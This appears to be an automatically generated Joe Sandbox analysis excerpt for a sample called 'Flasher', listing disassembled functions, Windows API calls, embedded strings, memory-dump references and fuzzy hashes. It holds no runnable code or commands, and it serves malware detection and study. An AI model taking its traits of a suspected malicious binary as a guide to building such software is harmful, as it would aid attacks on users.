SysFreeString.OLEAUT32 ref: 00007FF6D34F5CA1

Strings

WQLC:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\zip-0.6.4\src\write.rs, xrefs: 00007FF6D34F5AA9
0, xrefs: 00007FF6D34F5C34

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: String$Free$Alloc$Heap
String ID: 0$WQLC:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\zip-0.6.4\src\write.rs
API String ID: 3607330857-484539666
Opcode ID: 79193393cd9aae9933c581c69d8195d2a4fdda6eda3463619af06ff4fbb7f50c
Instruction ID: c151e60f96f36dbb456111cebfc29b609deb787bb367a4a6e7f0f51dde00ca28
Opcode Fuzzy Hash: 79193393cd9aae9933c581c69d8195d2a4fdda6eda3463619af06ff4fbb7f50c
Instruction Fuzzy Hash: 8F717F22A0DBC182E6618F16E4013AEE760FB95B84F089126DFCDA3B56DF3CE194D700

Function 00007FF6D35F3510 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D35DA120: HeapFree.KERNEL32(?,?,?,?,?,?,00000002,?,?,?,00007FF6D35D9B12), ref: 00007FF6D35DA268

HeapFree.KERNEL32 ref: 00007FF6D35F3606
CopyFileExW.KERNELBASE ref: 00007FF6D35F3647
HeapFree.KERNEL32 ref: 00007FF6D35F3669
HeapFree.KERNEL32 ref: 00007FF6D35F3688
GetLastError.KERNEL32 ref: 00007FF6D35F3698
HeapFree.KERNEL32 ref: 00007FF6D35F36BB

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$CopyErrorFileLast
String ID:
API String ID: 492081815-0
Opcode ID: 5c5abf95b1143d884ae228046510e9cc11e93cc7f9153528bd6642c1e4f37c46
Instruction ID: e45522c7c5dfbcec919de8f32fd54d08ba9fe63f061c956881667b8d5297ae33
Opcode Fuzzy Hash: 5c5abf95b1143d884ae228046510e9cc11e93cc7f9153528bd6642c1e4f37c46
Instruction Fuzzy Hash: FE417F66F05B4688FB40DBA2D8423BDA761BB88BD8F048536CE1DA7B9CDF38D1558340

Function 00007FF6D352E490 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130threadCOMMON

Download Yara Rule

APIs

AddVectoredExceptionHandler.KERNEL32 ref: 00007FF6D352E4B2
SetThreadStackGuarantee.KERNELBASE ref: 00007FF6D352E4C3
GetCurrentThread.KERNEL32 ref: 00007FF6D352E4C9
SetThreadDescription.KERNELBASE ref: 00007FF6D352E4E0

Strings

main, xrefs: 00007FF6D352E4D6

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: Thread$CurrentDescriptionExceptionGuaranteeHandlerStackVectored
String ID: main
API String ID: 3663057573-3207122276
Opcode ID: 056f1647f953d65845aad4485b219aeae60734370efb12bde1be905411e62aaf
Instruction ID: 4a38d11401f549ead01c649a54f9f9b24ac88075372b27c9148c8ecd91a843d8
Opcode Fuzzy Hash: 056f1647f953d65845aad4485b219aeae60734370efb12bde1be905411e62aaf
Instruction Fuzzy Hash: 3F614E36A05F4685EB50DB64E8823ACB7B0FB48764F548236C95CA77A4DF3CE5A9C340

Function 00007FF6D370004C Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 253COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF6D37000B6
memset.VCRUNTIME140 ref: 00007FF6D37000C7

Strings

out of memory, xrefs: 00007FF6D37000F6
database schema is locked: %s, xrefs: 00007FF6D37001FC
statement too long, xrefs: 00007FF6D37001D9

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memset
String ID: database schema is locked: %s$out of memory$statement too long
API String ID: 2221118986-1046679716
Opcode ID: 701757e88d7c0464e72d7e199289ecb80534d62b42c4d8c1637d4b905bea5959
Instruction ID: b73d94bf0dd32d30a5545c06e109e96844a6b2937eab2b9f3a5d0c3016b99ea0
Opcode Fuzzy Hash: 701757e88d7c0464e72d7e199289ecb80534d62b42c4d8c1637d4b905bea5959
Instruction Fuzzy Hash: 60B1C422A0DB8286E725CB62D5826BEE7B0FB49794F044036DB4DA7B85DF3DE465C304

Function 00007FF6D36C12C8 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 189COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D36F5538: memmove.VCRUNTIME140(?,?,?,?,00007FF6D36824D7,?,?,?,00000000,00000035,?,00000000,00007FF6D36D1D27), ref: 00007FF6D36F554A

memcmp.VCRUNTIME140(?,00000000,00000001,00007FF6D36D81CC,?,00000000,00000000,00007FF6D36D1E5F,00000000,00000000,00000080,00007FF6D3700310), ref: 00007FF6D36C133E
memcmp.VCRUNTIME140(?,00000000,00000001,00007FF6D36D81CC,?,00000000,00000000,00007FF6D36D1E5F,00000000,00000000,00000080,00007FF6D3700310), ref: 00007FF6D36C1386
memcmp.VCRUNTIME140(?,00000000,00000001,00007FF6D36D81CC,?,00000000,00000000,00007FF6D36D1E5F,00000000,00000000,00000080,00007FF6D3700310), ref: 00007FF6D36C13FA

Strings

SQLite format 3, xrefs: 00007FF6D36C136F
@ , xrefs: 00007FF6D36C13F0

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memcmp$memmove
String ID: @ $SQLite format 3
API String ID: 848149194-3708268960
Opcode ID: 8db51b3f6df84be0cc2006d3c1c03a6e51dddac8e6561db4a1fff68fe99ef894
Instruction ID: 227e5920f07906c098f1370f854e716e9ef6d1027079ed900615ad9aa2c19eaa
Opcode Fuzzy Hash: 8db51b3f6df84be0cc2006d3c1c03a6e51dddac8e6561db4a1fff68fe99ef894
Instruction Fuzzy Hash: C9711863B0829246FB10DF26D4422BDABA5EF84B98F094036DE0DE7786DE3CD865D750

Function 00007FF6D35724B0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 220COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?), ref: 00007FF6D357256B

Strings

assertion failed: match_dist >= 1, xrefs: 00007FF6D35727FD
assertion failed: match_len >= MIN_MATCH_LEN.into(), xrefs: 00007FF6D35727E5
assertion failed: match_dist as usize <= LZ_DICT_SIZE, xrefs: 00007FF6D3572815

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmove
String ID: assertion failed: match_dist >= 1$assertion failed: match_dist as usize <= LZ_DICT_SIZE$assertion failed: match_len >= MIN_MATCH_LEN.into()
API String ID: 2162964266-4225841344
Opcode ID: 1c287cb6dd19af40e3e66bee8495ca75f5682818547e9ee08ccface2cc130530
Instruction ID: f3916923899b8551d24039cdf043f7d950d41ae5ce4089de171fc44d2d4f0bd0
Opcode Fuzzy Hash: 1c287cb6dd19af40e3e66bee8495ca75f5682818547e9ee08ccface2cc130530
Instruction Fuzzy Hash: 6091A3A2A09A9681EA158F15D5423ECA760FB08BD0F448633DA8DA3B91DF7CE5F1C314

Function 00007FF6D35EC9B0 Relevance: 6.1, APIs: 4, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF6D35ECA18
HeapFree.KERNEL32 ref: 00007FF6D35ECA6E
HeapFree.KERNEL32 ref: 00007FF6D35ECA80
GetLastError.KERNEL32 ref: 00007FF6D35ECA86

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$CreateErrorLastThread
String ID:
API String ID: 1443094557-0
Opcode ID: ca5f7bfc4cfebd7b3c28d010939ad3fc9d2bf17995f1f2014006c66ef40a942b
Instruction ID: dd6b3663e3c12d8ba807120e4b0a41d44ce806fe6413997503c1ff02d1038b39
Opcode Fuzzy Hash: ca5f7bfc4cfebd7b3c28d010939ad3fc9d2bf17995f1f2014006c66ef40a942b
Instruction Fuzzy Hash: 6D318732B05B4585F7509B61E8023BDA7A1FB88B94F048536DE6CA7798DF3CD592C350

Function 00007FF6D35DE8E0 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D35DA120: HeapFree.KERNEL32(?,?,?,?,?,?,00000002,?,?,?,00007FF6D35D9B12), ref: 00007FF6D35DA268

CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D34F556D), ref: 00007FF6D35DE94B
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D34F556D), ref: 00007FF6D35DE966
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D34F556D), ref: 00007FF6D35DE970
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D34F556D), ref: 00007FF6D35DE991

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$CreateDirectoryErrorLast
String ID:
API String ID: 3527042468-0
Opcode ID: 6b645e2686f54b7b6b4263a4aef53a7db2a4a91820fad35115efc9f51e4507c6
Instruction ID: 9f563bb7f897d32b2822361e80140bac0db97b4398e33a1257550f43f539ba8b
Opcode Fuzzy Hash: 6b645e2686f54b7b6b4263a4aef53a7db2a4a91820fad35115efc9f51e4507c6
Instruction Fuzzy Hash: 12117865F05A1A84FB40D772E9421BDA7706F88FC4B580532CE5EB7B98DE2CD4628310

Function 00007FF6D37020D4 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 215COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 00007FF6D3702364

Strings

%s in "%s", xrefs: 00007FF6D3702374
unrecognized token: "%T", xrefs: 00007FF6D37022CB

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: _cwprintf_s_l
String ID: %s in "%s"$unrecognized token: "%T"
API String ID: 2941638530-735598712
Opcode ID: aba622d79f1eb66d26282a16f22a3daa9ebd9c1fedf2e223890e2409bb943c22
Instruction ID: efb715a45b6f6ab4d4483f30d94d3fe777058cb61b6a61f63cc45dddd8fe8550
Opcode Fuzzy Hash: aba622d79f1eb66d26282a16f22a3daa9ebd9c1fedf2e223890e2409bb943c22
Instruction Fuzzy Hash: 16A1A233A08B8682EB24DB26D4422BEF3A1FB84794F144133DA8DA7695DF3DE561C744

Function 00007FF6D35C54C0 Relevance: 5.2, APIs: 4, Instructions: 236memoryCOMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6D35C5629
HeapFree.KERNEL32 ref: 00007FF6D35C5652

Part of subcall function 00007FF6D35317F0: memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00007FF6D35318D5
Part of subcall function 00007FF6D35317F0: memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00007FF6D353198C

Part of subcall function 00007FF6D35C588B: memmove.VCRUNTIME140 ref: 00007FF6D35C5910

HeapFree.KERNEL32 ref: 00007FF6D35C57F3
HeapFree.KERNEL32 ref: 00007FF6D35C5831

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmove$FreeHeap
String ID:
API String ID: 3670176668-0
Opcode ID: c63524673e6e08f0d75c82cabf1d20c17ff4a4f0ec80246f6fd7203d0ac20dc6
Instruction ID: 475ef1ccfeb190eaf9d3685361656f075addd5c6ecae2ff5e8fdd23f8919e4be
Opcode Fuzzy Hash: c63524673e6e08f0d75c82cabf1d20c17ff4a4f0ec80246f6fd7203d0ac20dc6
Instruction Fuzzy Hash: 5BA1E922A08B8681E7209B66E4023BEF3A0FB94784F544537DE8DA7795DF3CE5A5C300

Function 00007FF6D352A097 Relevance: 5.2, APIs: 4, Instructions: 225memoryCOMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?), ref: 00007FF6D3529AB6
HeapFree.KERNEL32 ref: 00007FF6D352A25A
HeapFree.KERNEL32 ref: 00007FF6D352A27E

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$memmove
String ID:
API String ID: 2650465384-0
Opcode ID: 69e7b757fb245ff3543c92cc3d8c2f205d165c2342aa89a7f348f57fc5c92771
Instruction ID: 29491cbc22ffec18d84821022a465ea5de0a3628a29b52f3fe8737a9b53895ce
Opcode Fuzzy Hash: 69e7b757fb245ff3543c92cc3d8c2f205d165c2342aa89a7f348f57fc5c92771
Instruction Fuzzy Hash: 5DC1BC3AA08AC588E7719F25DC413ED67A0FB46B88F044136EA0D9FB89CF399756C340

Function 00007FF6D371D508 Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 239COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,00000004,00007FF6D367A0CD), ref: 00007FF6D371D600
memset.VCRUNTIME140(?,?,00000004,00007FF6D367A0CD), ref: 00007FF6D371D699

Strings

gfff, xrefs: 00007FF6D371D843

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memset
String ID: gfff
API String ID: 2221118986-1553575800
Opcode ID: 3f1b2de389e37dfa457b3d776674aac8e4d695f04a0cc4059d0f3fb95358f356
Instruction ID: db3b9b3e575a6ddb4c9840267ffeabc28031d6b00e6513ea3f033dbbda2f3594
Opcode Fuzzy Hash: 3f1b2de389e37dfa457b3d776674aac8e4d695f04a0cc4059d0f3fb95358f356
Instruction Fuzzy Hash: A9B11B32E1EE4386FB549B15AC6367CA7A0BF44784F40113BD41DE66A5DE6CF8219B0C

Function 00007FF6D36DDBF8 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 200stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00000001,MATCH,00000000,00000000,00007FF6D368D751), ref: 00007FF6D36DDC9B

Strings

MATCH, xrefs: 00007FF6D36DDC0A
unable to delete/modify user-function due to active statements, xrefs: 00007FF6D36DDE0A

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: strlen
String ID: MATCH$unable to delete/modify user-function due to active statements
API String ID: 39653677-3401026049
Opcode ID: 42d493848d45331dffd31dbfab914d2d29802044157e74944a43220535450a6c
Instruction ID: a7c67c6dadf337fdc40e69358a7a0b9a18792e17eb5cd550e17516bb83cd82bc
Opcode Fuzzy Hash: 42d493848d45331dffd31dbfab914d2d29802044157e74944a43220535450a6c
Instruction Fuzzy Hash: 4281C33260ABC182EB74AF25B54176EB6A4FF94B84F244136DE8CA7B58DF3CD4619700

Function 00007FF6D35E1700 Relevance: 4.6, APIs: 3, Instructions: 129networkCOMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6D35E175F
getaddrinfo.WS2_32 ref: 00007FF6D35E189A
WSAGetLastError.WS2_32 ref: 00007FF6D35E18A4

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: ErrorLastgetaddrinfomemmove
String ID:
API String ID: 1338285005-0
Opcode ID: f7cba9aa90f5d75a81ecbafa18ff51224466b3f37be874a4fe02cf2bf3ef1eb6
Instruction ID: 0866d24165be02193bdf5c0b6de422e49bbcc36d6dd1cefc29d9302cad007e40
Opcode Fuzzy Hash: f7cba9aa90f5d75a81ecbafa18ff51224466b3f37be874a4fe02cf2bf3ef1eb6
Instruction Fuzzy Hash: F851A162A08BC984E7658F65D9053FDA7A1EB44794F448232CA9DF77C4EF3C96A9C300

Function 00007FF6D35C2245 Relevance: 4.6, APIs: 3, Instructions: 106memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32 ref: 00007FF6D35C22FC
HeapFree.KERNEL32 ref: 00007FF6D35C2389
HeapFree.KERNEL32 ref: 00007FF6D35C23C0

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$QueryValue
String ID:
API String ID: 4159883869-0
Opcode ID: c6f0ff6ee241f5948628bef094a5c3d6ebc70b2c40a6cf4d0c85013a12592aba
Instruction ID: ebe3791830e30d9e2c23a878f4e27bcfce10123ee422ea338da7d1fb498924f0
Opcode Fuzzy Hash: c6f0ff6ee241f5948628bef094a5c3d6ebc70b2c40a6cf4d0c85013a12592aba
Instruction Fuzzy Hash: 1D41A232A19B8582EB409B11F44636EF760FB85B88F145436EE8D97B88CF7DD4A5CB40

Function 00007FF6D35EA630 Relevance: 4.6, APIs: 3, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D35DA120: HeapFree.KERNEL32(?,?,?,?,?,?,00000002,?,?,?,00007FF6D35D9B12), ref: 00007FF6D35DA268

HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6D35EA701
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6D35EA714
GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6D35EA73C

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$AttributesFile
String ID:
API String ID: 3036504266-0
Opcode ID: 0f5f23d987d33acb77ab3b0b71267dd83d0e83218b2d9abce1026c7decf16c21
Instruction ID: 49213e5d93e622fba707062ab86bc83eaefd0da4c8a5b5f1c87ce1802e5c77c7
Opcode Fuzzy Hash: 0f5f23d987d33acb77ab3b0b71267dd83d0e83218b2d9abce1026c7decf16c21
Instruction Fuzzy Hash: EF414A32A05F4688EB50CF65E8413ACA3B4BB487A4F144136CE6DA7B98DF39D0A1C300

Function 00007FF6D34F933B Relevance: 4.5, APIs: 3, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6D34F9356
HeapFree.KERNEL32 ref: 00007FF6D34F9370
RtlFreeHeap.NTDLL ref: 00007FF6D34F938A

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b5273e670981800afd9f88ae5754811464409107fdb57b7d1da2cb08936055dc
Instruction ID: 065b9af916cda9c823ddf44436a67991bf41e875372da2e67fae089080641da3
Opcode Fuzzy Hash: b5273e670981800afd9f88ae5754811464409107fdb57b7d1da2cb08936055dc
Instruction Fuzzy Hash: 38016221D0994682E764AB22E4463BEB361FF88744F444033C64EE66A4CF3CF4A6C344

Function 00007FF6D34F3CF0 Relevance: 3.9, APIs: 3, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140 ref: 00007FF6D34F3E13
HeapFree.KERNEL32 ref: 00007FF6D34F3F70

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

